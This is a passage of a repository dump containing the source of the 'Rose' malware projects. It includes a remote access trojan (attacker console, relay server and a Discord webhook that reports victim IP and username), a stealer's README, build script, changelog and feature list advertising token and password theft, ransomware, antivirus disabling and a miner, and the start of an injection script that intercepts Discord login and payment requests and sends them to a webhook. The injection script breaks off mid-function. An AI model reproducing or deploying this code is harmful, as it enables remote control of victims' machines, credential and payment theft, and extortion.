footer = kwargs.get('footer')
sid = kwargs.get('sid')
embed = Embed(
description='Victim disconnected from the server',
color=16399677,
timestamp='now' # sets the timestamp to current time
)
embed.set_author(name="Discord RAT Disconnected!", icon_url=avatar)
embed.set_footer(text=footer, icon_url=avatar)
embed.add_field(name="IP:", value=f'`{ip}`')
embed.add_field(name="Name", value=f'`{username}`')
embed.add_field(name='Server:', value=f'[{server}]({server})')
embed.add_field(name='Client ID:', value=f'`{sid}`')
webx = web(webhook)
webx.send(embed=embed)

236
Rose-Remote-Access-Trojan/attacker_client.py Normal file
View File

@@ -0,0 +1,236 @@
from pystyle import Colors, Colorate, Center, Box, Write
import os
import ctypes
import time
import socketio
import webbrowser
import json
import threading
__version__ = "1.0"
#with open("config.json", "r") as f:
# config = json.load(f)
# server_url = config["server_url"]
import logging
logging.basicConfig(
level=logging.DEBUG,
filename='attacker_client.log',
filemode='a',
format='[%(filename)s:%(lineno)d] - %(asctime)s - %(levelname)s - %(message)s'
)
logger = logging.getLogger(__name__)
server_url = Write.Input(" .$ Your server URL ? (should contains https://)", Colors.red_to_white, interval=0.025)
logger.info(f"Attacker using URL {server_url}")
os.system('cls')
ctypes.windll.kernel32.SetConsoleTitleW(f"Rose Client | v{__version__}")
banner = """
OooOOo.
o `o
O O
o .O
OOooOO' .oOo. .oOo .oOo.
o o O o `Ooo. OooO'
O O o O O O
O o `OoO' `OoO' `OoO'
"""
def start_attacker_screenshare():
def to_execute():
import eventlet
import socketio
from threading import Thread
from zlib import decompress
from mss import mss
import pygame
WIDTH = 1900
HEIGHT = 1000
_sio = socketio.Client()
pygame.init()
screen = pygame.display.set_mode((WIDTH, HEIGHT))
clock = pygame.time.Clock()
pygame.display.set_caption('Rose - Screenshare client - made by xpierroz')
@_sio.event
def connect():
print('screenshare attacker client connected')
_sio.emit("iam_attacker")
_sio.connect(server_url)
done = False
while not done:
for event in pygame.event.get():
if event.type == pygame.QUIT:
pygame.quit()
@_sio.event
def receiving_screenshot(data):
#msize_len = data['data']['size_len']
#msize_bytes = data['data']['size_bytes']
mpixels = data['data']['pixels']
pixels = decompress(mpixels)
# Create the Surface from raw pixels
img = pygame.image.fromstring(pixels, (WIDTH, HEIGHT), 'RGB')
# Display the picture
screen.blit(img, (0, 0))
pygame.display.flip()
clock.tick(60)
t = threading.Thread(target=to_execute)
t.run()
class Connected():
def __init__(self):
self.client_connected = 0
def change(self, number):
self.client_connected = number
def get(self):
logger.debug(f"Getting number of connected clients: {self.client_connected}")
return self.client_connected
class Serv():
sio = socketio.Client()
def __init__(self, url):
self.command = Command()
self.v = __version__
self._cmd = Command()
self.url = url
self._cmd = Command()
self._connected = Connected()
def _cls(self):
os.system('cls')
def home(self):
self._cls()
print(Colorate.Horizontal(Colors.red_to_white, Center.XCenter(banner)))
print('\n')
print(Colorate.Horizontal(Colors.red_to_white, Box.Lines(f'Attacker Client | v{__version__} | {self._connected.get()} Clients Connected')))
print('\n')
self.loop()
def not_valid(self, cmd):
logger.error(f"{cmd} - invalid command")
print(Colorate.Horizontal(Colors.red_to_white, f" .X {cmd} is not a valid command. Type 'help' for more info."))
time.sleep(2)
self.home()
def setup(self):
self.call_backs()
self.sio.connect(self.url)
self.sio.emit("number_connected")
time.sleep(1) #Wait for the server to send the number of clients connected before loading the UI
self.home()
def loop(self):
while True:
self.sio.emit("number_connected")
cmd = Write.Input("\n .$ ", Colors.red_to_white, interval=0.025)
if cmd == "help":
valid_commands = self.command.valid
print(Colorate.Horizontal(Colors.red_to_white, f" Valid commands:"))
for command in valid_commands:
print(Colorate.Horizontal(Colors.red_to_white, f" - {command}"))
print(Colorate.Horizontal(Colors.red_to_white, f" Press Enter to continue..."))
input()
self.home()
elif cmd == "exit":
exit()
else:
if not self._cmd.is_valid(cmd):
self.not_valid(cmd)
sid = Write.Input(" .$ SID ? ", Colors.red_to_white, interval=0.025)
try:
self.sio.emit(
'send_command',
{"data":
{"command": cmd,
"sid": sid
}
}
)
if cmd == "screenshare":
start_attacker_screenshare()
print(Colorate.Horizontal(Colors.green_to_white, f' .$ Command Sent to {sid}'))
except Exception as e: #Print command failed in red
print(Colorate.Horizontal(Colors.red_to_white, f' .$ Command Failed to {sid}'))
print(Colorate.Horizontal(Colors.red_to_white, f' .$ Advanced logs: {e}'))
time.sleep(2)
self.home(self._connected.get())
def call_backs(self):
@self.sio.event
def connect():
self.sio.emit('client_connect', {"data": "Attacker Client Connected"})
@self.sio.event
def all_sessions(data):
self._connected.change(data['data'])
ctypes.windll.kernel32.SetConsoleTitleW(f"Rose Client | v{__version__} | {self._connected.get()} Clients Connected")
@self.sio.event
def auth(data):
print(f"Data Received {data}")
@self.sio.event
def disconnect():
print('disconnected from server')
def run(self):
self.setup()
class Command():
def __init__(self):
self.valid = [
'messagebox',
'shell',
'webcampic',
'voice',
'admincheck',
'sysinfo',
'history',
'write',
'wallpaper',
'clipboard',
'geolocate',
'volumemax',
'volumezero',
'blockinput',
'unblockinput',
'screenshot',
'kill',
'screenshare'
]
def is_valid(self, command):
try:
command = command.split(' ')[0]
except Exception:
pass
return any(command == j for j in self.valid)
ss = Serv(server_url)
ss.run()

11
Rose-Remote-Access-Trojan/index.html Normal file
View File

@@ -0,0 +1,11 @@
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Rose RAT</title>
</head>
<body>
</body>
</html>

82
Rose-Remote-Access-Trojan/main.py Normal file
View File

@@ -0,0 +1,82 @@
import eventlet
import socketio
import _webhook
import _data
sio = socketio.Server()
app = socketio.WSGIApp(sio,
static_files={
'/': {
'content_type': 'text/html',
'filename': 'index.html'
}
})
web = _webhook.Weboh()
db = _data.DatabaseX()
def save_sid(sid, ip, username, server, webhook, avatar, footer):
db.enter_values(sid, ip, username, server, webhook, avatar, footer)
def disconnect_sid(sid):
db.delete_sid(sid)
@sio.event
def sending_screenshot(sid, data):
print(f'{sid} - sending screenshot')
sio.emit('receiving_screenshot', {'data': data['data']})
@sio.event
def send_command(sid, data):
dicx = data['data']
sio.emit('receive_command', {'data': dicx["command"]}, room=dicx["sid"])
@sio.event
def connect(sid, environ):
print(f'{sid} - connected')
@sio.event
def client_connect(sid, data):
print("Attacker Connected", data)
@sio.event
def number_connected(sid): #Return the number of connected clients
number = db.get_sessions()
sio.emit("all_sessions", {"data": number}, room=sid)
@sio.event
def rose_connect(sid, rose_data):
f = rose_data['data']
web.on_connect(ip=f['ip'],
username=f['username'],
server=f['server'],
webhook=f['webhook'],
avatar=f['avatar'],
footer=f['footer'],
sid=sid)
save_sid(sid, f['ip'], f['username'], f['server'], f['webhook'],
f['avatar'], f['footer'])
@sio.event
def disconnect(sid):
print('disconnect ', sid)
f = db.get_all(sid)
if f is None:
return
web.on_disconnect(ip=f[1],
username=f[2],
server=f[3],
webhook=f[4],
avatar=f[5],
footer=f[6],
sid=sid)
disconnect_sid(sid)
if __name__ == '__main__':
eventlet.wsgi.server(eventlet.listen(('', 5000)), app)

BIN
Rose-Remote-Access-Trojan/readme/Rose.jpeg Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 76 KiB

BIN
Rose-Remote-Access-Trojan/readme/attacker_client.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 15 KiB

BIN
Rose-Remote-Access-Trojan/readme/events.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 89 KiB

BIN
Rose-Remote-Access-Trojan/readme/exemple_command.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 23 KiB

3
Rose-Remote-Access-Trojan/requirements.txt Normal file
View File

@@ -0,0 +1,3 @@
dhooks
python-socketio
eventlet

BIN
Rose-Remote-Access-Trojan/sessions.db Normal file
View File

Binary file not shown.

2
Rose-Stealerv1/.bandit Normal file
View File

@@ -0,0 +1,2 @@
[bandit]
skips = B605, B607

10
Rose-Stealerv1/.deepsource.toml Normal file
View File

@@ -0,0 +1,10 @@
version = 1
[[analyzers]]
name = "javascript"
[[analyzers]]
name = "python"
[analyzers.meta]
runtime_version = "3.x.x"

38
Rose-Stealerv1/.github/ISSUE_TEMPLATE/bug_report.md vendored Normal file
View File

@@ -0,0 +1,38 @@
---
name: Bug report
about: Create a report to help us improve
title: ''
labels: ''
assignees: ''
---
**Describe the bug**
A clear and concise description of what the bug is.
**To Reproduce**
Steps to reproduce the behavior:
1. Go to '...'
2. Click on '....'
3. Scroll down to '....'
4. See error
**Expected behavior**
A clear and concise description of what you expected to happen.
**Screenshots**
If applicable, add screenshots to help explain your problem.
**Desktop (please complete the following information):**
- OS: [e.g. iOS]
- Browser [e.g. chrome, safari]
- Version [e.g. 22]
**Smartphone (please complete the following information):**
- Device: [e.g. iPhone6]
- OS: [e.g. iOS8.1]
- Browser [e.g. stock browser, safari]
- Version [e.g. 22]
**Additional context**
Add any other context about the problem here.

20
Rose-Stealerv1/.github/ISSUE_TEMPLATE/feature_request.md vendored Normal file
View File

@@ -0,0 +1,20 @@
---
name: Feature request
about: Suggest an idea for this project
title: ''
labels: ''
assignees: ''
---
**Is your feature request related to a problem? Please describe.**
A clear and concise description of what the problem is. Ex. I'm always frustrated when [...]
**Describe the solution you'd like**
A clear and concise description of what you want to happen.
**Describe alternatives you've considered**
A clear and concise description of any alternative solutions or features you've considered.
**Additional context**
Add any other context or screenshots about the feature request here.

160
Rose-Stealerv1/.gitignore vendored Normal file
View File

@@ -0,0 +1,160 @@
# Byte-compiled / optimized / DLL files
__pycache__/
*.py[cod]
*$py.class
# C extensions
*.so
# Distribution / packaging
.Python
build/
develop-eggs/
dist/
downloads/
eggs/
.eggs/
lib/
lib64/
parts/
sdist/
var/
wheels/
share/python-wheels/
*.egg-info/
.installed.cfg
*.egg
MANIFEST
# PyInstaller
# Usually these files are written by a python script from a template
# before PyInstaller builds the exe, so as to inject date/other infos into it.
*.manifest
*.spec
# Installer logs
pip-log.txt
pip-delete-this-directory.txt
# Unit test / coverage reports
htmlcov/
.tox/
.nox/
.coverage
.coverage.*
.cache
nosetests.xml
coverage.xml
*.cover
*.py,cover
.hypothesis/
.pytest_cache/
cover/
# Translations
*.mo
*.pot
# Django stuff:
*.log
local_settings.py
db.sqlite3
db.sqlite3-journal
# Flask stuff:
instance/
.webassets-cache
# Scrapy stuff:
.scrapy
# Sphinx documentation
docs/_build/
# PyBuilder
.pybuilder/
target/
# Jupyter Notebook
.ipynb_checkpoints
# IPython
profile_default/
ipython_config.py
# pyenv
# For a library or package, you might want to ignore these files since the code is
# intended to run in multiple environments; otherwise, check them in:
# .python-version
# pipenv
# According to pypa/pipenv#598, it is recommended to include Pipfile.lock in version control.
# However, in case of collaboration, if having platform-specific dependencies or dependencies
# having no cross-platform support, pipenv may install dependencies that don't work, or not
# install all needed dependencies.
#Pipfile.lock
# poetry
# Similar to Pipfile.lock, it is generally recommended to include poetry.lock in version control.
# This is especially recommended for binary packages to ensure reproducibility, and is more
# commonly ignored for libraries.
# https://python-poetry.org/docs/basic-usage/#commit-your-poetrylock-file-to-version-control
#poetry.lock
# pdm
# Similar to Pipfile.lock, it is generally recommended to include pdm.lock in version control.
#pdm.lock
# pdm stores project-wide configurations in .pdm.toml, but it is recommended to not include it
# in version control.
# https://pdm.fming.dev/#use-with-ide
.pdm.toml
# PEP 582; used by e.g. github.com/David-OConnor/pyflow and github.com/pdm-project/pdm
__pypackages__/
# Celery stuff
celerybeat-schedule
celerybeat.pid
# SageMath parsed files
*.sage.py
# Environments
.env
.venv
env/
venv/
ENV/
env.bak/
venv.bak/
# Spyder project settings
.spyderproject
.spyproject
# Rope project settings
.ropeproject
# mkdocs documentation
/site
# mypy
.mypy_cache/
.dmypy.json
dmypy.json
# Pyre type checker
.pyre/
# pytype static type analyzer
.pytype/
# Cython debug symbols
cython_debug/
# PyCharm
# JetBrains specific template is maintained in a separate JetBrains.gitignore that can
# be found at https://github.com/github/gitignore/blob/main/Global/JetBrains.gitignore
# and can be added to the global gitignore or merged into this file. For a more nuclear
# option (not recommended) you can uncomment the following to ignore the entire idea folder.
#.idea/

21
Rose-Stealerv1/LICENSE Normal file
View File

@@ -0,0 +1,21 @@
MIT License
Copyright (c) 2023 Gum-s
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.

88
Rose-Stealerv1/README.md Normal file
View File

@@ -0,0 +1,88 @@
<h1 id="top" align="center">
<br>
<a href="https://github.com/0xrose/Rose-Stealer_old">
<img src="resources/assets/builder.png" alt="R">
</a>
<br>
</h1>
<div align="center" style="background-color: #da467d; padding: 20px;">
<a href="https://discord.gg/sMawrDqnta">
<img src="https://img.shields.io/badge/Discord-%23FF0060.svg?style=for-the-badge&logo=discord&logoColor=white" alt="Join our Discord">
</a>
<a href="https://t.me/rosegrabber">
<img src="https://img.shields.io/badge/Telegram-%23FF0060.svg?style=for-the-badge&logo=telegram&logoColor=white" alt="Join our Telegram">
</a>
<br>
<br>
<img src="https://img.shields.io/github/languages/top/0xrose/Rose-Stealer_old?color=%23FF0060&style=for-the-badge" alt="Top Languages">
<img src="https://img.shields.io/github/stars/0xrose/Rose-Stealer_old?color=%23FF0060&logoColor=%23FF0060&style=for-the-badge" alt="Stars">
<br>
<img src="https://img.shields.io/github/commit-activity/w/0xrose/Rose-Stealer_old?color=%23FF0060&style=for-the-badge" alt="Commit Activity">
<img src="https://img.shields.io/github/last-commit/0xrose/Rose-Stealer_old?color=%23FF0060&logoColor=%23FF0060&style=for-the-badge" alt="Last Commit">
<br>
<img src="https://img.shields.io/github/issues/0xrose/Rose-Stealer_old?color=%23FF0060&style=for-the-badge" alt="Open Issues">
<img src="https://img.shields.io/github/issues-closed/0xrose/Rose-Stealer_old?color=%23FF0060&style=for-the-badge" alt="Closed Issues">
<br>
</div>
<hr style="border-radius: 2%; margin-top: 60px; margin-bottom: 60px;" noshade="" size="20" width="100%">
<div align="center">
<h1>
Python-Powered Discord Token Logger: Max Stealth, Minimal Detection, and a Gorgeous UI Builder!
</h1>
</div>
### ⚠️ The development team is working on a full rewrite and an entire new version for Rose currently. This one will not receive updates anymore and a new repository is going to get created soon.
### We are looking forward to stable release the rewritten version soon. You can check the devwork out at the [new repository](https://github.com/0xrose/Rose-Stealer_old).
### Features
A list of features can be found in our [documentation](https://github.com/0xrose/Rose-Stealer_old/tree/main/docs/FEATURES.md).
### Disclaimer
This tool is explicitly designed and provided exclusively for educational intentions. Its primary objective is to illuminate the vulnerabilities that files can be susceptible to, highlighting the need for proactive security measures. It is imperative that this tool is never leveraged for any illegal, unauthorized, or malicious undertakings. Under no circumstances will I assume liability for any detrimental consequences inflicted upon your computing infrastructure. I hereby absolve myself from any complicity in activities of an illicit nature. Emphatically, this tool's utility is confined to didactic objectives.
Please be cognizant of the fact that nestled within the intricate architecture of this tool is an elaborate mechanism with latent potential, which, if wielded in an iniquitous manner, could conceivably lead to the illicit acquisition of Discord Nitro privileges through the exploitation of compromised accounts. Nevertheless, I vehemently discourage any endeavor to explore or exploit this covert facet for personal enrichment or unscrupulous exploits. The primary rationale behind divulging this concealed facet is to underscore the paramount importance of fortifying personal data security and adhering to the ethical deployment of technological instruments.
### Setup
**Before proceeding, briefly disable your antivirus to avoid accidental removal of important components. Install Python properly, ensuring it's added to PATH. Preferably, use Python 3.11 and uninstall other versions. Thanks!**
- Download repository [here](https://github.com/0xrose/Rose-Stealer_old/archive/refs/heads/main.zip).
- Extract the zip file.
- Launch UI by executing [`build.bat`](https://github.com/0xrose/Rose-Stealer_old/blob/main/build.bat).
### Problems? Get help!
**You can contact us here:**
- [Telegram](https://t.me/gumbobr0t)
- [Discord](https://discord.gg/sMawrDqnta)
- [Issues](https://github.com/0xrose/Rose-Stealer_old/issues)
### Docs
For more guidance on e.g. the rats or the builder, you should check out the [docs](https://github.com/0xrose/Rose-Stealer_old/tree/main/docs) folder.
### Changelog
The changelog history can be found in our [documentation](https://github.com/0xrose/Rose-Stealer_old/tree/main/docs/CHANGELOG.md).
### Credits
- [xpierroz](https://github.com/xpierroz)
- [killer](https://github.com/Minecraftkillir)
- [Smug246](https://github.com/Smug246)
- [addi00000](https://github.com/addi00000)
- [Rdimo](https://github.com/Rdimo)
- [loTus04](https://github.com/loTus04)
- [suvan1911](https://github.com/suvan1911)
- [suegdu](https://github.com/suenerve)
- [blank](https://github.com/blank-c)
- [something-0001](https://github.com/smth.py)
- [rud3p](https://github.com/rud3p)
### Thanks 💞
[![Star History Chart](https://api.star-history.com/svg?repos=0xrose/Rose-Stealer_old&type=Date)](https://star-history.com/#0xrose/Rose-Stealer_old&Date)

35
Rose-Stealerv1/build.bat Normal file
View File

@@ -0,0 +1,35 @@
@echo off
color 4
setlocal EnableDelayedExpansion
title Looking for Python...
where python >nul 2>nul
if errorlevel 1 (
echo Python is not installed. Please install it over this link, but also make sure to add it to PATH. Then restart this file.
echo https://www.python.org/ftp/python/3.11.6/python-3.11.6-amd64.exe
pause
exit
) else (
echo Python is installed.
)
title Creating venv...
echo Creating venv...
python -m venv rosevenv
title Entering venv...
echo Entering venv...
call rosevenv\Scripts\activate
title Installing packages...
echo Installing packages...
echo This may take a while. Be pacient!
python -m pip install --upgrade --ignore-installed -r resources\data\requirements.txt
title Starting builder...
echo Starting builder...
start /min cmd.exe /c "python resources\ui\builder.py"
endlocal
pause

80
Rose-Stealerv1/docs/CHANGELOG.md Normal file
View File

@@ -0,0 +1,80 @@
- **2.3 (2023-12-19)**
- Added more browser paths
- Added more roblox browser methods
- Added base code for methods
- Added XMR Miner
- Added Knight-RAT documentation
- Added wd exclusion cmd
- Added obfuscation
- Fixed UAC bypass
- Fixed Knight-RAT commands
- Fixed builder
- Fixed Ransomware
- Knight RAT refactor
- Restructured logging system
- Restructured documentation and readme
- Rewrote startup script
(Update by gumbobr0t)
- **2.2 (2023-10-20)**
- Added bsod on run
- Added batch fork bomb
- Added block sites [unblocker](https://github.com/rose-dll/Rose-Stealer/tree/main/resources/utils)
- Added block protectors (e.g. anti-viruses, firewalls etc.)
- Fixed UAC bypass
- Fixed system information
- Reordered folder structure
(Fixed by gumbobr0t)
- **2.1 (2023-10-18)**
- Fixed system information hanging and restarting the process over and over. (py-cpuinfo -> wmi package)
- Fixed the executable dying because of a shitty import. (__webhook.py --> webhook.py)
- Removed unused libraries from some of the files.
- Ransomware Key is deleted from memory once it's used up fully.
- Better formating of HWID, Power, and Screen information.
- Handling of empty lists in the power and WiFi variables for future error prevention.
(Hardfix by something-0001)
- **2.0 (2023-10-02)**
- Added hidden path to browser and more
- Fixed wifi password stealing
- Fixed ransomware
- Fixed webcam stealing
- Rewrote embeds for discordc class, screenshot and webcam now embedded inside of message
- Added Exodus, Telegram, Steam, Minecraft, Uplay and Epic Games session stealing
- Fixed install and start script
- Fixed antivm not exiting correctly
- **1.9 (2023-09-12)**
- Rewrote ransomware, changed payment to monero
- Added ransomware decrypter to [components/tools](https://github.com/rose-dll/Rose-Stealer/tree/main/resources/utils)
- Fixed startup
- Fixed builder (cleanup, upx, returnzip)
- Rewrote/Fixed install and start script
- **1.8 (2023-09-02)**
- Added spread malware on discord feature
- Added additional error handling
- Added other UPX compression
- Added extension spoofer
- Fixed builder not showing compile CMD
- **1.7 (2023-08-14)**
- Added ransomware
- Fixed return zip file
- **1.6 (2023-08-14)**
- Added Anti-VM
- Added UAC bypass
- Added better icon selection in builder
- Fixed browser stealing
- **1.5 (2023-08-10)**
- Improved obfuscation and file type selection
- Added log buttons and file pumper
- **1.4 (2023-08-09)**
- Added custom icon support and file pumper
- Fixed Windows Defender detection
- ...

43
Rose-Stealerv1/docs/FEATURES.md Normal file
View File

@@ -0,0 +1,43 @@
## Features
| Feature | Description | Status |
|---------------------------------------|----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|--------|
| GUI Builder | Create user-friendly interfaces easily. | Done |
| UAC Bypass | Bypass User Account Control for elevated privileges. | Done |
| Custom Icon | Set a unique icon for your application. | Done |
| Runs On Startup | Automatically start with Windows. | Done |
| Disables Windows Defender | Disable built-in antivirus protection and firewalls. | Done |
| Anti-VM | Detect and evade virtual machine environments. | Done |
| Blocks AV-Related Sites | Prevent access to antivirus websites. Unblocker can be found here [resources/utils](https://github.com/rose-dll/Rose-Stealer/blob/main/resources/utils/unblocker/unblock_sites.py). | Done |
| Melt Stub | Make the malware difficult to detect by self-destructing. | Done |
| Fake Error | Display fake error messages to deceive users. | Done |
| EXE Binder | Combine multiple files into a single executable. | Later |
| File Pumper | Inflate file sizes to hide malicious content. | Done |
| Obfuscated Code | Use code obfuscation techniques for evasion. | Done |
| Discord Injection | Inject code into Discord processes. | Done |
| Steals Discord Tokens | Extract user tokens from Discord. | Done |
| Mass DM Discord Friends | DM's every user on the victims discord accounts friendlist. | Done |
| Steals Steam Session | Gather active Steam sessions. | Done |
| Steals Epic Session | Gather active Epic Games sessions. | Done |
| Steals Uplay Session | Gather active Uplay sessions. | Done |
| Steals Passwords From Many Browsers | Extract stored passwords. | Done |
| Steals Cookies From Many Browsers | Collect browser cookies. | Done |
| Steals History From Many Browsers | Access browsing history. | Done |
| Steals Autofills From Many Browsers | Extract autofill data. | Later |
| Steals Minecraft Session Files | Gather Minecraft session information. | Done |
| Steals Telegram Session Files | Extract Telegram session data. | Done |
| Steals Crypto Wallets | Target cryptocurrency wallets. | Done |
| Steals Roblox Cookies | Gather Roblox-related data. | Done |
| Steals IP Information | Collect IP addresses. | Done |
| Steals System Info | Gather system-specific details. | Done |
| Steals Saved Wifi Passwords | Extract saved Wi-Fi passwords. | Done |
| Steals Common Files | Collect files commonly used for attacks. | Later |
| Captures Screenshot | Take screenshots of the user's desktop. | Done |
| Captures Webcam Image | Access and capture webcam images. | Done |
| Sends All Data Through Discord Webhook | Send stolen data to specified destinations. | Done |
| File Type Selection | Choose between screensaver or executable. | Done |
| Trigger BSOD | Cause a Blue Screen of Death. | Done |
| Freeze Screen | Freeze the user's screen. | Later |
| Spread Malware | Send malicious messages to friends on social media. | Later |
| Crypto Miner | Use the victim's computer for cryptocurrency mining. | Done |
| Ransomware | Forces the victim to pay you a specific amount of USD in Monero or they will lose all their data. Decrypter can be found in [resources/utils](https://github.com/DamagingRose/Rose-Grabber/tree/main/resources/utils/rosedec). | Done |

26
Rose-Stealerv1/docs/KNIGHT.md Normal file
View File

@@ -0,0 +1,26 @@
# ⚔️ · 🛡️ · ♞ · 🤺 · 🏰 · 🗡️ · ⚜️ · ⚔ · ♘
# Knight Rat: A Beginner's Guide
## Introduction
Have you ever wondered about Knight Rat and how it operates? Look no further; this guide is here to help you understand the basics of this Python-based remote access trojan.
## What is Knight Rat?
Knight Rat is a powerful remote access trojan designed in Python, allowing users to gain unauthorized access to a computer and execute various commands. The process involves running a file, executing a predefined set of actions, and establishing a connection through a Discord bot to a remote server, providing full control over the targeted computer.
## How Does it Work?
In a nutshell, the victim runs the Knight Rat file, which connects to a Discord bot. The bot then attempts to send a message to the designated channel, using a custom-generated rat UID with the ping. By employing the "!clients" command, you can retrieve all connected IDs. Subsequently, you gain control over the targeted computer, with a comprehensive set of commands accessible through "!help." When you want to execute a specific command on a victim you can do it like this ---> **example**: `!screenshot 871623`
## Preparing the Bot
Before diving into the setup, you must create a bot application on [Discord Developers](https://discord.com/developers/applications). Navigate to the bot tab, enabling all privileged gateway intents. Refer to [this image](https://cdn.discordapp.com/attachments/1180179668498927618/1180981629313880144/image.png?ex=657f65da&is=656cf0da&hm=46c8ba00046c6f165d78b53a7f48480809ab7b3def429cd8dc6fb67256606f44&) for guidance. Once done, invite the bot to your server with administrator permissions, using [this link](https://cdn.discordapp.com/attachments/1180179668498927618/1180982394652737566/image.png?ex=657f6690&is=656cf190&hm=d1ab6a46c1080fffb966aaeda4d09c1ae2942480663fed29369d002098ccb4aa&).
## Setup
When building a stub with Rose and enabling the Knight Rat feature, fill in the required fields. Reset the bot token, [copy the channel ID](https://www.youtube.com/watch?v=YjiQ7CajAgg) for command operations. Choose a command prefix like "!" or ".", or leave it empty. Congratulations, you've successfully set up Knight Rat!
### Important Note
Knight Rat is a basic rat designed for .py usage, created for fun with no intention of further updates or improvements. It comes with limited features and a straightforward interface. Do not expect enhancements or fixes, as the author has no plans for future updates.
## ⚠️ Final Warning
If you find this guide challenging or seek assistance, be warned any requests for help may result in an immediate ban. The author does not intend to provide support, explanations, or any further assistance.
**Remember, use this information responsibly and ethically, respecting privacy and legal boundaries.**

BIN
Rose-Stealerv1/resources/assets/builder.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 29 KiB

BIN
Rose-Stealerv1/resources/assets/rose.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 8.8 KiB

BIN
Rose-Stealerv1/resources/assets/roseloadingscreen.mp4 Normal file
View File

Binary file not shown.

986
Rose-Stealerv1/resources/data/injection.js Normal file
View File

@@ -0,0 +1,986 @@
const args = process.argv;
const fs = require('fs');
const path = require('path');
const https = require('https');
const querystring = require('querystring');
const { BrowserWindow, session } = require('electron');
const config = {
webhook: '%WEBHOOK%', //your discord webhook there obviously or use the api from https://github.com/Rdimo/Discord-Webhook-Protector | Recommend using https://github.com/Rdimo/Discord-Webhook-Protector so your webhook can't be spammed or deleted
webhook_protector_key: '%WEBHOOK_KEY%', //your base32 encoded key IF you're using https://github.com/Rdimo/Discord-Webhook-Protector
auto_buy_nitro: false, //automatically buys nitro for you if they add credit card or paypal or tries to buy nitro themselves
ping_on_run: false, //sends whatever value you have in ping_val when you get a run/login
ping_val: '@everyone', //change to @here or <@ID> to ping specific user if you want, will only send if ping_on_run is true
embed_name: 'Rose-Stealer', //name of the webhook thats gonna send the info
embed_icon: 'https://raw.githubusercontent.com/rose-dll/Rose-Stealer/main/resources/assets/Rose.png', //icon for the webhook thats gonna send the info (yes you can have spaces in the url)
embed_color: 16711680, //color for the embed, needs to be hexadecimal (just copy a hex and then use https://www.binaryhexconverter.com/hex-to-decimal-converter to convert it)
injection_url: 'https://raw.githubusercontent.com/rose-dll/Rose-Stealer/main/resources/data/obf-injection.js', //injection url for when it reinjects
/**
* @ATTENTION DON'T TOUCH UNDER HERE IF UNLESS YOU'RE MODIFYING THE INJECTION OR KNOW WHAT YOU'RE DOING @ATTENTION
**/
api: 'https://discord.com/api/v9/users/@me',
nitro: {
boost: {
year: {
id: '521847234246082599',
sku: '511651885459963904',
price: '9999',
},
month: {
id: '521847234246082599',
sku: '511651880837840896',
price: '999',
},
},
classic: {
month: {
id: '521846918637420545',
sku: '511651871736201216',
price: '499',
},
},
},
filter: {
urls: [
'https://discord.com/api/v*/users/@me',
'https://discordapp.com/api/v*/users/@me',
'https://*.discord.com/api/v*/users/@me',
'https://discordapp.com/api/v*/auth/login',
'https://discord.com/api/v*/auth/login',
'https://*.discord.com/api/v*/auth/login',
'https://api.braintreegateway.com/merchants/49pp2rp4phym7387/client_api/v*/payment_methods/paypal_accounts',
'https://api.stripe.com/v*/tokens',
'https://api.stripe.com/v*/setup_intents/*/confirm',
'https://api.stripe.com/v*/payment_intents/*/confirm',
],
},
filter2: {
urls: [
'https://status.discord.com/api/v*/scheduled-maintenances/upcoming.json',
'https://*.discord.com/api/v*/applications/detectable',
'https://discord.com/api/v*/applications/detectable',
'https://*.discord.com/api/v*/users/@me/library',
'https://discord.com/api/v*/users/@me/library',
'wss://remote-auth-gateway.discord.gg/*',
],
},
};
function parity_32(x, y, z) {
return x ^ y ^ z;
}
function ch_32(x, y, z) {
return (x & y) ^ (~x & z);
}
function maj_32(x, y, z) {
return (x & y) ^ (x & z) ^ (y & z);
}
function rotl_32(x, n) {
return (x << n) | (x >>> (32 - n));
}
function safeAdd_32_2(a, b) {
var lsw = (a & 0xffff) + (b & 0xffff),
msw = (a >>> 16) + (b >>> 16) + (lsw >>> 16);
return ((msw & 0xffff) << 16) | (lsw & 0xffff);
}
function safeAdd_32_5(a, b, c, d, e) {
var lsw = (a & 0xffff) + (b & 0xffff) + (c & 0xffff) + (d & 0xffff) + (e & 0xffff),
msw = (a >>> 16) + (b >>> 16) + (c >>> 16) + (d >>> 16) + (e >>> 16) + (lsw >>> 16);
return ((msw & 0xffff) << 16) | (lsw & 0xffff);
}
function binb2hex(binarray) {
var hex_tab = '0123456789abcdef',
str = '',
length = binarray.length * 4,
i,
srcByte;
for (i = 0; i < length; i += 1) {
srcByte = binarray[i >>> 2] >>> ((3 - (i % 4)) * 8);
str += hex_tab.charAt((srcByte >>> 4) & 0xf) + hex_tab.charAt(srcByte & 0xf);
}
return str;
}
function getH() {
return [0x67452301, 0xefcdab89, 0x98badcfe, 0x10325476, 0xc3d2e1f0];
}
function roundSHA1(block, H) {
var W = [],
a,
b,
c,
d,
e,
T,
ch = ch_32,
parity = parity_32,
